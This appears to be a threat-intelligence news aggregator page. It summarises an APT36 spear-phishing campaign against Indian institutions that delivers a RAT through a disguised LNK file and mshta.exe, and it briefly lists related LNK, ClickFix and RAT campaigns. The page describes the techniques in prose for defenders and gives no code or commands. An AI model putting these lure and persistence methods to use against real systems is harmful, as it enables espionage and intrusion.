Transparent Tribe launches spear-phishing RAT campaign against Indian entities
Campaign
Summary
Hide ▲
Show ▼
Transparent Tribe (APT36) has launched a fresh spear-phishing campaign against Indian governmental, academic, and strategic entities, increasing the risk of persistent remote access on compromised systems. The operation uses a ZIP archive carrying a LNK file disguised as a PDF to trigger a RAT through mshta.exe. The malware also adapts its persistence method to the antivirus present on the host and opens a decoy PDF to reduce suspicion. The activity fits the group's long-running espionage focus and shows continued operational refinement.
Related Happenings
CRESCENTHARVEST malicious .LNK espionage campaign targeting Iran protest supporters
Campaign
First: 19.02.2026 10:13
Last: 19.02.2026 10:13
Sources 1
About this happening:
The **CRESCENTHARVEST** campaign is using **malicious .LNK files** and social engineering to target **supporters of Iran's ongoing protests** for **information theft** and **long-...
CRESCENTHARVEST malicious .LNK espionage campaign targeting Iran protest supporters
CampaignAbout this happening: The **CRESCENTHARVEST** campaign is using **malicious .LNK files** and social engineering to target **supporters of Iran's ongoing protests** for **information theft** and **long-...
CRESCENTHARVEST Windows RAT and info-stealer activity
Malware Activity
First: 19.02.2026 10:13
Last: 19.02.2026 10:13
Sources 1
About this happening:
The **CRESCENTHARVEST** malware activity centers on **version.dll**, a **Windows RAT and information stealer** that can execute commands, log keystrokes, and exfiltrate data. It m...
CRESCENTHARVEST Windows RAT and info-stealer activity
Malware ActivityAbout this happening: The **CRESCENTHARVEST** malware activity centers on **version.dll**, a **Windows RAT and information stealer** that can execute commands, log keystrokes, and exfiltrate data. It m...
ClickFix DNS-based nslookup staging campaign
Campaign
First: 15.02.2026 16:10
Last: 15.02.2026 16:10
Sources 1
About this happening:
The **ClickFix** campaign has added **DNS-based staging** that uses **nslookup** in the **Windows Run dialog** to fetch and run a second-stage payload, making malicious execution...
ClickFix DNS-based nslookup staging campaign
CampaignAbout this happening: The **ClickFix** campaign has added **DNS-based staging** that uses **nslookup** in the **Windows Run dialog** to fetch and run a second-stage payload, making malicious execution...
Microsoft silently patches in Windows LNK files remote code execution flaw (CVE-2025-9491)
Vulnerability
First: 12.02.2026 23:01
Last: 12.02.2026 23:01
Sources 1
About this happening:
**Windows LNK shortcut files** remain the focus of this vulnerability thread: **CVE-2025-9491** / **ZDI-CAN-25373** is being used in **September-October 2025** spear-phishing atta...
Microsoft silently patches in Windows LNK files remote code execution flaw (CVE-2025-9491)
VulnerabilityAbout this happening: **Windows LNK shortcut files** remain the focus of this vulnerability thread: **CVE-2025-9491** / **ZDI-CAN-25373** is being used in **September-October 2025** spear-phishing atta...
Lnk-it-up open-source suite for generating and detecting malicious Windows LNK shortcuts
Security Tool/Service
First: 12.02.2026 23:01
Last: 12.02.2026 23:01
Sources 1
About this happening:
**lnk-it-up** is a newly released open-source suite for **Windows LNK shortcuts** that helps testers generate deceptive files and helps defenders spot shortcuts where **Explorer**...
Lnk-it-up open-source suite for generating and detecting malicious Windows LNK shortcuts
Security Tool/ServiceAbout this happening: **lnk-it-up** is a newly released open-source suite for **Windows LNK shortcuts** that helps testers generate deceptive files and helps defenders spot shortcuts where **Explorer**...
Timeline
-
02.01.2026 15:52 2 articles · 4mo ago
Transparent Tribe targets Indian entities with spear-phishing RAT campaign
Initial DisclosureTransparent Tribe, also called APT36, is attributed to a fresh spear-phishing campaign against Indian governmental, academic, and strategic entities that uses a ZIP archive with a LNK file disguised as a PDF to launch a remote access trojan through mshta.exe. The infection chain decrypts and loads the RAT in memory, opens a decoy PDF to reduce suspicion, and adapts persistence to the antivirus found on the victim host, including Startup-folder LNK or batch-file methods and registry-based fallback techniques. The malware family supports remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.
Show sources
- Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia — thehackernews.com — 02.01.2026 15:52
- Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia — thehackernews.com — 02.01.2026 15:52